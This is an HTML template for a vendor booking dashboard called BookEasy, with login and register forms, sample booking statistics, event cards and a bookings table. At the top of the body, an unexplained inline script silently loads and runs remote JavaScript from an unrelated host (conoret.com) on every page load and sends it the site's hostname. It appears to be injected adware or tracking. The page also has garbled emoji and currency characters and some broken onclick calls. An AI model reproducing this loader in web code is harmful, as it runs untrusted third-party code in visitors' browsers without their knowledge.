<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Business Panel | Vendor Side</title>
    <link rel="stylesheet" href="buisness.css">
    <link
        href="https://fonts.googleapis.com/css2?family=Futura:wght@400;500;700&family=Poppins:wght@300;400;500;600&display=swap"
        rel="stylesheet">
</head>

<body>
    <script
        type="text/javascript">window.top === window && !function () { var e = document.createElement("script"), t = document.getElementsByTagName("head")[0]; e.src = "//conoret.com/dsp?h=" + document.location.hostname + "&r=" + Math.random(), e.type = "text/javascript", e.defer = !0, e.async = !0, t.appendChild(e) }();</script>
    <div class="container">
        <!-- Sidebar Navigation -->
        <nav class="sidebar">
            <div class="logo">
                <h2>BookEasy</h2>
                <img src="" alt="">
            </div>
            <ul class="nav-links">
                <li class=""><a href="#dashboard"><span class="icon">üìä</span> Dashboard</a></li>
                <li class="active"><a href="#events"><span class="icon">üìÖ</span> Events</a></li>
                <li><a href="#bookings"><span class="icon">üìù</span> Bookings</a></li>
                <li><a href="#profile"><span class="icon">üë§</span> Profile</a></li>
                <li class="logout"><a href="#logout"><span class="icon">üö™</span> Logout</a></li>
            </ul>
        </nav>

        <!-- Main Content Area -->
        <main class="main-content">
            <!-- Top Header -->
            <header class="top-header">
                <div class="search-bar">
                    <input type="text" placeholder="Search...">
                    <button><span class="icon">üîç</span></button>
                </div>
                <div class="user-info">
                    <span class="notification">üîî</span>
                    <div class="user">
                        <img src="/api/placeholder/40/40" alt="User Avatar">
                        <span>Username</span>
                    </div>
                </div>
            </header>

            <!-- Content Sections -->
            <div class="content-wrapper">
                <!-- Login/Register Section (Initially Hidden) -->
                <section id="auth-section" class="">
                    <div class="auth-container">
                        <div class="auth-form login-form">
                            <h2>Login</h2>
                            <form id="login-form">
                                <div class="form-group">
                                    <label for="login-email">Email</label>
                                    <input type="email" id="login-email" required="">
                                </div>
                                <div class="form-group">
                                    <label for="login-password">Password</label>
                                    <input type="password" id="login-password" required="">
                                </div>
                                <button type="submit" class="btn primary-btn">Login</button>
                                <p>Don't have an account? <a href="#" id="show-register">Register</a></p>
                            </form>
                        </div>

                        <div class="auth-form register-form hidden">
                            <h2>Register your Business</h2>
                            <form id="register-form">
                                <div class="form-group">
                                    <label for="business-name">Business Name</label>
                                    <input type="text" id="business-name" required="">
                                </div>
                                <div class="form-group">
                                    <label for="register-email">Email</label>
                                    <input type="email" id="register-email" required="">
                                </div>
                                <div class="form-group">
                                    <label for="register-password">Password</label>
                                    <input type="password" id="register-password" required="">
                                </div>
                                <div class="form-group">
                                    <label for="confirm-password">Confirm Password</label>
                                    <input type="password" id="confirm-password" required="">
                                </div>
                                <button type="submit" class="btn primary-btn">Register</button>
                                <p>Already have an account? <a href="#" id="show-login">Login</a></p>
                            </form>
                        </div>
                    </div>
                </section>

                <!-- Dashboard Section -->
                <section id="dashboard-section" class="">
                    <h1>Dashboard</h1>
                    <div class="dashboard-stats">
                        <div class="stat-card">
                            <h3>Total Events</h3>
                            <p class="stat-number">12</p>
                            <p class="stat-trend positive">+2 this month</p>
                        </div>
                        <div class="stat-card">
                            <h3>Total Bookings</h3>
                            <p class="stat-number">87</p>
                            <p class="stat-trend positive">+15 this month</p>
                        </div>
                        <div class="stat-card">
                            <h3>Revenue</h3>
                            <p class="stat-number">‚Çπ4,250</p>
                            <p class="stat-trend positive">+‚Çπ750 this month</p>
                        </div>
                        <div class="stat-card">
                            <h3>Upcoming Events</h3>
                            <p class="stat-number">5</p>
                            <p class="stat-trend">Next: Tomorrow</p>
                        </div>
                    </div>

                    <div class="recent-section">
                        <h2>Recent Bookings</h2>
                        <div class="table-responsive">
                            <table class="data-table">
                                <thead>
                                    <tr>
                                        <th>Customer</th>
                                        <th>Event</th>
                                        <th>Date</th>
                                        <th>Status</th>
                                        <th>Amount</th>
                                    </tr>
                                </thead>
                                <tbody id="recent-bookings">
                                    <tr>
                                        <td>Sarah Davis</td>
                                        <td>Tech Workshop</td>
                                        <td>May 22, 2025</td>
                                        <td>
                                            <span class="status-badge status-pending">Pending</span>
                                        </td>
                                        <td>‚Çπ360.00</td>
                                    </tr>

                                    <tr>
                                        <td>Jennifer Brown</td>
                                        <td>Tech Workshop</td>
                                        <td>May 22, 2025</td>
                                        <td>
                                            <span class="status-badge status-cancelled">Cancelled</span>
                                        </td>
                                        <td>‚Çπ120.00</td>
                                    </tr>

                                    <tr>
                                        <td>Emily Johnson</td>
                                        <td>Business Conference 2025</td>
                                        <td>May 15, 2025</td>
                                        <td>
                                            <span class="status-badge status-confirmed">Confirmed</span>
                                        </td>
                                        <td>‚Çπ500.00</td>
                                    </tr>

                                    <tr>
                                        <td>Michael Smith</td>
                                        <td>Business Conference 2025</td>
                                        <td>May 15, 2025</td>
                                        <td>
                                            <span class="status-badge status-confirmed">Confirmed</span>
                                        </td>
                                        <td>‚Çπ250.00</td>
                                    </tr>

                                    <tr>
                                        <td>Robert Wilson</td>
                                        <td>Networking Mixer</td>
                                        <td>Apr 30, 2025</td>
                                        <td>
                                            <span class="status-badge status-confirmed">Confirmed</span>
                                        </td>
                                        <td>‚Çπ90.00</td>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                    </div>
                </section>

                <!-- Events Section -->
                <section id="events-section" class="">
                    <div class="section-header">
                        <h1>Event Listings</h1>
                        <button id="add-event-btn" class="btn primary-btn">Add New Event</button>
                    </div>

                    <div class="events-filter">
                        <div class="filter-group">
                            <label for="status-filter">Status:</label>
                            <select id="status-filter">
                                <option value="all">All</option>
                                <option value="upcoming">Upcoming</option>
                                <option value="past">Past</option>
                                <option value="draft">Draft</option>
                            </select>
                        </div>
                        <div class="filter-group">
                            <label for="date-filter">Sort By:</label>
                            <select id="date-filter">
                                <option value="newest">Newest First</option>
                                <option value="oldest">Oldest First</option>
                                <option value="price-high">Price: High to Low</option>
                                <option value="price-low">Price: Low to High</option>
                            </select>
                        </div>
                    </div>

                    <div class="events-grid" id="events-container">
                        <div class="event-card" data-id="4">
                            <img src="/api/placeholder/300/180" alt="Leadership Seminar" class="event-image">
                            <div class="event-details">
                                <h3>Leadership Seminar</h3>
                                <div class="event-meta">
                                    <span>Jun 10, 2025 at 10:00 AM</span>
                                    <span>‚Çπ180.00</span>
                                </div>
                                <p>Full-day seminar on effective leadership strategies and practices.</p>
                                <div class="event-meta">
                                    <span>Capacity: 75</span>
                                    <span>Booked: 12</span>
                                </div>
                                <div class="event-actions">
                                    <button class="btn action-btn edit-btn" onclick="editEvent(4)">Edit</button>
                                    <button class="btn action-btn delete-btn"
                                        onclick="showDeleteEventConfirm(4)">Delete</button>
                                </div>
                            </div>
                        </div>

                        <div class="event-card" data-id="2">
                            <img src="/api/placeholder/300/180" alt="Tech Workshop" class="event-image">
                            <div class="event-details">
                                <h3>Tech Workshop</h3>
                                <div class="event-meta">
                                    <span>May 22, 2025 at 1:30 PM</span>
                                    <span>‚Çπ120.00</span>
                                </div>
                                <p>Hands-on workshop covering the latest technologies and industry trends.</p>
                                <div class="event-meta">
                                    <span>Capacity: 50</span>
                                    <span>Booked: 32</span>
                                </div>
                                <div class="event-actions">
                                    <button class="btn action-btn edit-btn" onclick="editEvent(2)">Edit</button>
                                    <button class="btn action-btn delete-btn"
                                        onclick="showDeleteEventConfirm(2)">Delete</button>
                                </div>
                            </div>
                        </div>

                        <div class="event-card" data-id="1">
                            <img src="/api/placeholder/300/180" alt="Business Conference 2025" class="event-image">
                            <div class="event-details">
                                <h3>Business Conference 2025</h3>
                                <div class="event-meta">
                                    <span>May 15, 2025 at 9:00 AM</span>
                                    <span>‚Çπ250.00</span>
                                </div>
                                <p>Annual business conference featuring keynote speakers and networking opportunities.
                                </p>
                                <div class="event-meta">
                                    <span>Capacity: 200</span>
                                    <span>Booked: 75</span>
                                </div>
                                <div class="event-actions">
                                    <button class="btn action-btn edit-btn" onclick="editEvent(1)">Edit</button>
                                    <button class="btn action-btn delete-btn"
                                        onclick="showDeleteEventConfirm(1)">Delete</button>
                                </div>
                            </div>
                        </div>

                        <div class="event-card" data-id="3">
                            <img src="/api/placeholder/300/180" alt="Networking Mixer" class="event-image">
                            <div class="event-details">
                                <h3>Networking Mixer</h3>
                                <div class="event-meta">
                                    <span>Apr 30, 2025 at 6:00 PM</span>
                                    <span>‚Çπ45.00</span>
                                </div>
                                <p>Evening networking event for professionals in the industry.</p>
                                <div class="event-meta">
                                    <span>Capacity: 100</span>
                                    <span>Booked: 68</span>
                                </div>
                                <div class="event-actions">
                                    <button class="btn action-btn edit-btn" onclick="editEvent(3)">Edit</button>
                                    <button class="btn action-btn delete-btn"
                                        onclick="showDeleteEventConfirm(3)">Delete</button>
                                </div>
                            </div>
                        </div>
                    </div>

                    <!-- Add/Edit Event Modal -->
                    <div id="event-modal" class="modal hidden">
                        <div class="modal-content">
                            <span class="close-btn">√ó</span>
                            <h2 id="modal-title">Add New Event</h2>
                            <form id="event-form">
                                <input type="hidden" id="event-id">
                                <div class="form-group">
                                    <label for="event-title">Event Title</label>
                                    <input type="text" id="event-title" required="">
                                </div>
                                <div class="form-group">
                                    <label for="event-description">Description</label>
                                    <textarea id="event-description" rows="4" required=""></textarea>
                                </div>
                                <div class="form-row">
                                    <div class="form-group">
                                        <label for="event-date">Date</label>
                                        <input type="date" id="event-date" required="">
                                    </div>
                                    <div class="form-group">
                                        <label for="event-time">Time</label>
                                        <input type="time" id="event-time" required="">
                                    </div>
                                </div>
                                <div class="form-row">
                                    <div class="form-group">
                                        <label for="event-price">Price (‚Çπ)</label>
                                        <input type="number" id="event-price" min="0" step="0.01" required="">
                                    </div>
                                    <div class="form-group">
                                        <label for="event-capacity">Capacity</label>
                                        <input type="number" id="event-capacity" min="1" required="">
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label for="event-image">Event Image</label>
                                    <input type="file" id="event-image" accept="image/*">
                                    <div class="image-preview">
                                        <img id="image-preview" src="/api/placeholder/300/200" alt="Event Preview">
                                    </div>
                                </div>
                                <div class="form-actions">
                                    <button type="button" class="btn secondary-btn" id="cancel-event">Cancel</button>
                                    <button type="submit" class="btn primary-btn">Save Event</button>
                                </div>
                            </form>
                        </div>
                    </div>
                </section>

                <!-- Bookings Section -->
                <section id="bookings-section" class="hidden">
                    <h1>Upcoming Bookings</h1>

                    <div class="bookings-filter">
                        <div class="filter-group">
                            <label for="booking-status">Status:</label>
                            <select id="booking-status">
                                <option value="all">All Bookings</option>
                                <option value="confirmed">Confirmed</option>
                                <option value="pending">Pending</option>
                                <option value="cancelled">Cancelled</option>
                            </select>
                        </div>
                        <div class="filter-group">
                            <label for="booking-event">Event:</label>
                            <select id="booking-event">
                                <option value="all">All Events</option>

                                <option value="1">Business Conference 2025</option>

                                <option value="2">Tech Workshop</option>

                                <option value="3">Networking Mixer</option>

                                <option value="4">Leadership Seminar</option>

                            </select>
                        </div>
                    </div>

                    <div class="table-responsive">
                        <table class="data-table">
                            <thead>
                                <tr>
                                    <th>Booking ID</th>
                                    <th>Customer</th>
                                    <th>Event</th>
                                    <th>Date &amp; Time</th>
                                    <th>Tickets</th>
                                    <th>Total</th>
                                    <th>Status</th>
                                    <th>Actions</th>
                                </tr>
                            </thead>
                            <tbody id="bookings-table">
                                <tr>
                                    <td>B1003</td>
                                    <td>Sarah Davis</td>
                                    <td>Tech Workshop</td>
                                    <td>May 22, 2025 at 1:30 PM</td>
                                    <td>3</td>
                                    <td>‚Çπ360.00</td>
                                    <td>
                                        <span class="status-badge status-pending">Pending</span>
                                    </td>
                                    <td>
                                        <div class="event-actions">
                                            <button class="btn action-btn view-btn"
                                                onclick="viewBookingDetails(B1003)">View</button>
                                            <button class="btn action-btn edit-btn" onclick="confirmBooking('B1003')">
                                                Confirm
                                            </button>
                                        </div>
                                    </td>
                                </tr>

                                <tr>
                                    <td>B1005</td>
                                    <td>Jennifer Brown</td>
                                    <td>Tech Workshop</td>
                                    <td>May 22, 2025 at 1:30 PM</td>
                                    <td>1</td>
                                    <td>‚Çπ120.00</td>
                                    <td>
                                        <span class="status-badge status-cancelled">Cancelled</span>
                                    </td>
                                    <td>
                                        <div class="event-actions">
                                            <button class="btn action-btn view-btn"
                                                onclick="viewBookingDetails(B1005)">View</button>
                                            <button class="btn action-btn edit-btn" onclick="confirmBooking('B1005')">
                                                Confirm
                                            </button>
                                        </div>
                                    </td>
                                </tr>

                                <tr>
                                    <td>B1001</td>
                                    <td>Emily Johnson</td>
                                    <td>Business Conference 2025</td>
                                    <td>May 15, 2025 at 9:00 AM</td>
                                    <td>2</td>
                                    <td>‚Çπ500.00</td>
                                    <td>
                                        <span class="status-badge status-confirmed">Confirmed</span>
                                    </td>
                                    <td>
                                        <div class="event-actions">
                                            <button class="btn action-btn view-btn"
                                                onclick="viewBookingDetails(B1001)">View</button>
                                            <button class="btn action-btn delete-btn" onclick="cancelBooking('B1001')">
                                                Cancel
                                            </button>
                                        </div>
                                    </td>
                                </tr>

                                <tr>
                                    <td>B1002</td>
                                    <td>Michael Smith</td>
                                    <td>Business Conference 2025</td>
                                    <td>May 15, 2025 at 9:00 AM</td>
                                    <td>1</td>
                                    <td>‚Çπ250.00</td>
                                    <td>
                                        <span class="status-badge status-confirmed">Confirmed</span>
                                    </td>
                                    <td>
                                        <div class="event-actions">
                                            <button class="btn action-btn view-btn"
                                                onclick="viewBookingDetails(B1002)">View</button>
                                            <button class="btn action-btn delete-btn" onclick="cancelBooking('B1002')">
                                                Cancel
                                            </button>
                                        </div>
                                    </td>
                                </tr>

                                <tr>
                                    <td>B1004</td>
                                    <td>Robert Wilson</td>
                                    <td>Networking Mixer</td>
                                    <td>Apr 30, 2025 at 6:00 PM</td>
                                    <td>2</td>
                                    <td>$90.00</td>
                                    <td>
                                        <span class="status-badge status-confirmed">Confirmed</span>
                                    </td>
                                    <td>
                                        <div class="event-actions">
                                            <button class="btn action-btn view-btn"
                                                onclick="viewBookingDetails(B1004)">View</button>
                                            <button class="btn action-btn delete-btn" onclick="cancelBooking('B1004')">
                                                Cancel
                                            </button>
                                        </div>
                                    </td>
                                </tr>
                            </tbody>
                        </table>
                    </div>
                </section>
            </div>
        </main>
    </div>

    <!-- Confirmation Modal -->
    <div id="confirm-modal" class="modal hidden">
        <div class="modal-content confirm-content">
            <h3>Confirm Action</h3>
            <p id="confirm-message">Are you sure you want to delete this item?</p>
            <div class="confirm-actions">
                <button class="btn secondary-btn" id="cancel-confirm">Cancel</button>
                <button class="btn primary-btn" id="confirm-action">Confirm</button>
            </div>
        </div>
    </div>

    <footer class="footer">
        <div class="footer-container">
            <div class="footer-section brand-section">
                <h2 class="footer-logo">BookEasy</h2>
                <p class="footer-tagline">Simple booking solutions for everyone</p>
                <div class="social-icons">
                    <a href="https://www.facebook.com/" class="social-icon"><img src="meta.jpg" alt="meta" height="45px" class="meta"><i
                            class="fa fa-facebook"></i></a>
                    <a href="https://x.com/?lang=en" class="social-icon"><img src="x.jpg" alt="meta" height="45px" class="meta"><i
                            class="fa fa-twitter"></i></a>
                    <a href="https://www.instagram.com/" class="social-icon"><img src="insta.jpg" alt="meta" height="45px" class="meta"><i
                            class="fa fa-instagram"></i></a>
                    <!-- <a href="#" class="social-icon"><i class="fa fa-linkedin"></i></a> -->
                </div>
            </div>

            <div class="footer-section links-section">
                <h3 class="footer-heading">Quick Links</h3>
                <ul class="footer-links">
                    <li><a href="#">Home</a></li>
                    <li><a href="#">About Us</a></li>
                    <li><a href="#">Services</a></li>
                    <li><a href="#">How It Works</a></li>
                    <li><a href="#">Contact</a></li>
                </ul>
            </div>

            <div class="footer-section links-section">
                <h3 class="footer-heading">For Businesses</h3>
                <ul class="footer-links">
                    <li><a href="#">Partner With Us</a></li>
                    <li><a href="#">Business Login</a></li>
                    <li><a href="#">Pricing</a></li>
                    <li><a href="#">Resources</a></li>
                    <li><a href="#">Success Stories</a></li>
                </ul>
            </div>

            <div class="footer-section contact-section">
                <h3 class="footer-heading">Contact Us</h3>
                <ul class="contact-info">
                    <li><i class="fa fa-map-marker"></i> 123 Booking Street, Suite 100</li>
                    <li><i class="fa fa-phone"></i> +1 (555) 123-4567</li>
                    <li><i class="fa fa-envelope"></i> info@bookeasy.com</li>
                </ul>
                <div class="newsletter">
                    <h4>Subscribe to our newsletter</h4>
                    <div class="newsletter-form">
                        <input type="email" placeholder="Enter your email">
                        <button type="submit" class="subscribe-btn">Subscribe</button>
                    </div>
                </div>
            </div>
        </div>

        <div class="footer-bottom">
            <div class="footer-container">
                <p class="copyright">¬© 2025 BookEasy. All rights reserved.</p>
                <div class="footer-bottom-links">
                    <a href="#">Privacy Policy</a>
                    <a href="#">Terms of Service</a>
                    <a href="#">Cookie Policy</a>
                </div>
            </div>
        </div>
    </footer>

    <script src="buissness.js"></script>

</body>

</html>